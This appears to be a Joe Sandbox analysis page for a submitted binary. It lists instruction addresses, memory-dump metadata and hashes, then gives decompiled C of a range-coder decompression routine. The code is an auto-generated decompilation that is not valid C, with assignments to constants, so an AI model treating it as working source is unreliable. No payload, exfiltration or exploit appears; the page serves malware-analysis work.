0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00000000
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x00000000
0x00407267
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x00000000
0x004073da
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00000000
0x0040722f
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00406A4F Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406A4F(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004074A1))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
